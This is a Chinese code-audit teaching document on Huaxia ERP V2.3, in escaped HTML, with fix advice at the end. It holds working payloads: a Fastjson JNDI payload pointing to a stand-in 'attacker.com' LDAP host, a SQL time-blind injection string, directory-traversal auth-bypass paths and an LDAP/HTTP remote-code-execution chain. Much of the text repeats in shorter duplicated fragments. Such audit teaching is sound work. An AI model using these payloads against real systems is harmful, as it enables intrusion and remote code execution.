华夏ERP V2.3代码审计分析教学文档<\/h1>

系统概述<\/h2>
华夏ERP V2.3是基于Java开发的企业资源管理系统，采用Spring Boot框架构建，存在多处安全漏洞。<\/p>

环境配置<\/h2>

JDK版本<\/strong>: 1.8<\/li>
数据库配置<\/strong>: 通过application.properties文件配置数据库连接<\/li>

测试账户<\/strong>: 用户名jsh，密码123456<\/li> <\/ul>
依赖组件安全分析<\/h2>
1. Fastjson反序列化漏洞<\/h3>
版本<\/strong>: 1.2.55
漏洞类型<\/strong>: 反序列化、黑名单绕过、JNDI注入导致RCE<\/p>
风险详情<\/strong>:<\/p>

autoType功能默认开启，允许在JSON中指定类名进行反序列化<\/li>
黑名单认证机制存在缺陷，可多种方式绕过<\/li>
可导致JNDI注入实现远程代码执行<\/li> <\/ul>
攻击Payload<\/strong>:<\/p>
{ <\/span><\/span> "@type"<\/span>: "com.sun.rowset.JdbcRowSetImpl"<\/span>, <\/span><\/span> "dataSourceName"<\/span>: "ldap:\/\/attacker.com\/Exploit"<\/span>, <\/span><\/span> "autoCommit"<\/span>: true<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>2. Log4j漏洞<\/h3> 版本<\/strong>: 2.10.0 组件<\/strong>: log4j-to-slf4j 风险<\/strong>: 存在已知安全漏洞，需升级版本<\/p> 3. MyBatis数据库框架<\/h3> 版本<\/strong>: 3.0.7.1 风险<\/strong>: 存在SQL注入风险点<\/p> 4. Swagger-UI<\/h3> 版本<\/strong>: 2.7.0 用途<\/strong>: API文档生成，可能存在信息泄露风险<\/p> 项目结构分析<\/h2> java\/ └── com\/ └── jsh\/ └── erp\/ ├── config\/ # 配置类 ├── constants\/ # 常量定义 ├── controller\/ # 控制器层 ├── datasource\/ # 数据源配置 ├── exception\/ # 异常处理 ├── filter\/ # 过滤器 ├── service\/ # 服务层 └── utils\/ # 工具类 <\/code><\/pre> SQL注入漏洞分析<\/h2> 漏洞原理<\/h3> MyBatis中使用${}<\/code>进行字符串拼接，直接将参数内容不加修饰符拼接在SQL中，导致注入风险。<\/p> 常见风险场景<\/h3> 模糊查询<\/strong>: %${param}%<\/code>形式<\/li> IN语句<\/strong>: in (${param})<\/code>形式<\/li> ORDER BY<\/strong>: order by ${param}<\/code>语句<\/li> <\/ol> 具体漏洞位置<\/h3> DAO层<\/strong>: selectByConditionDepot方法<\/li> 参数来源<\/strong>: search参数中的name键值对<\/li> 调用链<\/strong>: 通过通用功能层代码，多个API调用同一段代码<\/li> <\/ul> 验证方法<\/h3> 时间盲注Payload<\/strong>:<\/p> search={"name":"test' AND SLEEP(5) AND '1'='1"} <\/code><\/pre> 影响接口<\/strong>:<\/p> \/depot\/list<\/code> - 仓库管理列表<\/li> \/user\/list<\/code> - 用户管理列表（loginName和userName参数）<\/li> <\/ul> 注入特征<\/strong>:<\/p> 执行时间延迟明显<\/li> sleep函数执行次数与分页参数相关<\/li> 可在IDEA日志中查看实际执行的SQL语句<\/li> <\/ul> XSS漏洞分析<\/h2> 存储型XSS漏洞位置<\/h3> 采购订单模块<\/strong><\/p> 新增商品处的多个输入框<\/li> 每次访问采购订单页面都会触发<\/li> <\/ul> <\/li> 销售管理模块<\/strong><\/p> 添加客户信息处的客户名称字段<\/li> <\/ul> <\/li> 仓库管理模块<\/strong><\/p> 添加供应商名称字段<\/li> <\/ul> <\/li> 财务管理模块<\/strong><\/p> 收支单处的项目添加字段<\/li> <\/ul> <\/li> <\/ol> 攻击验证<\/h3> 在所有文本输入框中插入XSS Payload均可成功触发弹窗。<\/p> 鉴权绕过漏洞分析<\/h2> 过滤器配置<\/h3> 文件<\/strong>: LogCostFilter过滤器拦截路径<\/strong>: \/*<\/code>（所有路径）<\/p> 初始化参数<\/strong>:<\/p> ignoredUrl<\/code>: 忽略.css、.js、.jpg、.png、.gif、.ico文件类型<\/li> filterPath<\/code>: 特殊处理路径\/user\/login、\/user\/registerUser、\/v2\/api-docs<\/li> <\/ul> 绕过方法一：目录遍历<\/h3> 原理<\/strong>: 使用startsWith()函数判断URL开头，可通过目录穿越绕过 Payload<\/strong>: \/user\/login\/..\/..\/需要访问的路径<\/code><\/p> 绕过方法二：路径参数绕过<\/h3> 原理<\/strong>: 正则表达式^.*\.css.*$<\/code>过于宽泛，只要URL包含忽略列表内容即可匹配 Payload<\/strong>:<\/p> \/.gif\/..\/account\/getAcount<\/code><\/li> \/path;.gif\/..\/需要访问的路径<\/code><\/li> <\/ul> 其他放行条件<\/h3> URL包含\/doc.html<\/code>、\/register.html<\/code>、\/login.html<\/code>中任意一个即可放行。<\/p> Fastjson反序列化漏洞利用<\/h2> 检测方法<\/h3> 全局搜索以下关键词：<\/p> parseObject(<\/code><\/li> JSON.parseObject(<\/code><\/li> JSONObject.parse(<\/code><\/li> JSONObject.parseObject(<\/code><\/li> JSON.parse()<\/code><\/li> JSON.parseObject()<\/code><\/li> <\/ul> 漏洞验证<\/h3> DNSLog检测Payload<\/strong>:<\/p> search=<\/span>{"@type"<\/span>:"java.net.Inet4Address"<\/span>,"val"<\/span>:"dnslog-domain.com"<\/span>} <\/span><\/span><\/code><\/pre>确认特征<\/strong>: 明确设置defaultRedisConfig.setAutoTypeSupport(true)<\/code><\/p> 攻击利用<\/h3> 所需组件<\/strong>:<\/p> LDAP服务器（LDAPServer.java）<\/li> 恶意class文件（Executor.java编译）<\/li> HTTP服务托管class文件<\/li> <\/ol> 执行流程<\/strong>:<\/p> 启动HTTP服务提供class文件下载<\/li> 运行LDAP服务器进行引用指向<\/li> 发送恶意JSON请求触发反序列化<\/li> <\/ol> 安全机制绕过<\/h3> AutoType为false时<\/strong>: 先黑名单过滤，再白名单过滤<\/li> AutoType为true时<\/strong>: 先白名单过滤，再黑名单过滤<\/li> <\/ul> 修复建议<\/h2> 立即措施<\/h3> 升级Fastjson<\/strong>至安全版本<\/li> 替换MyBatis拼接方式<\/strong>，使用#{}<\/code>预编译<\/li> 加强输入过滤<\/strong>，对所有用户输入进行严格验证<\/li> 修复鉴权逻辑<\/strong>，使用路径标准化后验证<\/li> <\/ol> 长期加固<\/h3> 实施严格的权限验证机制<\/li> 添加安全中间件进行请求过滤<\/li> 建立代码安全审查流程<\/li> 定期进行安全漏洞扫描<\/li> <\/ol> 总结<\/h2> 华夏ERP V2.3存在严重的安全隐患，涉及SQL注入、XSS、鉴权绕过和反序列化漏洞，需立即进行安全修复和代码重构。<\/p>

华夏ERP V2.3代码审计分析教学文档<\/h1>

系统概述<\/h2>
华夏ERP V2.3是基于Java开发的企业资源管理系统，采用Spring Boot框架构建，存在多处安全漏洞。<\/p>

依赖组件安全分析<\/h2>

2. Log4j漏洞<\/h3>
版本<\/strong>: 2.10.0
组件<\/strong>: log4j-to-slf4j
风险<\/strong>: 存在已知安全漏洞，需升级版本<\/p>

SQL注入漏洞分析<\/h2>

漏洞原理<\/h3>
MyBatis中使用`${}<\/code>进行字符串拼接，直接将参数内容不加修饰符拼接在SQL中，导致注入风险。<\/p>`

XSS漏洞分析<\/h2>

攻击验证<\/h3>
在所有文本输入框中插入XSS Payload均可成功触发弹窗。<\/p>

鉴权绕过漏洞分析<\/h2>

绕过方法一：目录遍历<\/h3>
原理<\/strong>: 使用startsWith()函数判断URL开头，可通过目录穿越绕过
Payload<\/strong>: `\/user\/login\/..\/..\/需要访问的路径<\/code><\/p>`

其他放行条件<\/h3>
URL包含`\/doc.html<\/code>、\/register.html<\/code>、\/login.html<\/code>中任意一个即可放行。<\/p>`

修复建议<\/h2>

总结<\/h2>
华夏ERP V2.3存在严重的安全隐患，涉及SQL注入、XSS、鉴权绕过和反序列化漏洞，需立即进行安全修复和代码重构。<\/p>

华夏ERP V2.3代码审计分析教学文档<\/h1>

系统概述<\/h2> 华夏ERP V2.3是基于Java开发的企业资源管理系统，采用Spring Boot框架构建，存在多处安全漏洞。<\/p>

依赖组件安全分析<\/h2>

2. Log4j漏洞<\/h3> 版本<\/strong>: 2.10.0 组件<\/strong>: log4j-to-slf4j 风险<\/strong>: 存在已知安全漏洞，需升级版本<\/p>

SQL注入漏洞分析<\/h2>

漏洞原理<\/h3> MyBatis中使用${}<\/code>进行字符串拼接，直接将参数内容不加修饰符拼接在SQL中，导致注入风险。<\/p>

XSS漏洞分析<\/h2>

攻击验证<\/h3> 在所有文本输入框中插入XSS Payload均可成功触发弹窗。<\/p>

鉴权绕过漏洞分析<\/h2>

绕过方法一：目录遍历<\/h3> 原理<\/strong>: 使用startsWith()函数判断URL开头，可通过目录穿越绕过 Payload<\/strong>: \/user\/login\/..\/..\/需要访问的路径<\/code><\/p>

其他放行条件<\/h3> URL包含\/doc.html<\/code>、\/register.html<\/code>、\/login.html<\/code>中任意一个即可放行。<\/p>

修复建议<\/h2>

总结<\/h2> 华夏ERP V2.3存在严重的安全隐患，涉及SQL注入、XSS、鉴权绕过和反序列化漏洞，需立即进行安全修复和代码重构。<\/p>

系统概述<\/h2>
华夏ERP V2.3是基于Java开发的企业资源管理系统，采用Spring Boot框架构建，存在多处安全漏洞。<\/p>

2. Log4j漏洞<\/h3>
版本<\/strong>: 2.10.0
组件<\/strong>: log4j-to-slf4j
风险<\/strong>: 存在已知安全漏洞，需升级版本<\/p>

漏洞原理<\/h3>
MyBatis中使用`${}<\/code>进行字符串拼接，直接将参数内容不加修饰符拼接在SQL中，导致注入风险。<\/p>`

攻击验证<\/h3>
在所有文本输入框中插入XSS Payload均可成功触发弹窗。<\/p>

绕过方法一：目录遍历<\/h3>
原理<\/strong>: 使用startsWith()函数判断URL开头，可通过目录穿越绕过
Payload<\/strong>: `\/user\/login\/..\/..\/需要访问的路径<\/code><\/p>`

其他放行条件<\/h3>
URL包含`\/doc.html<\/code>、\/register.html<\/code>、\/login.html<\/code>中任意一个即可放行。<\/p>`

总结<\/h2>
华夏ERP V2.3存在严重的安全隐患，涉及SQL注入、XSS、鉴权绕过和反序列化漏洞，需立即进行安全修复和代码重构。<\/p>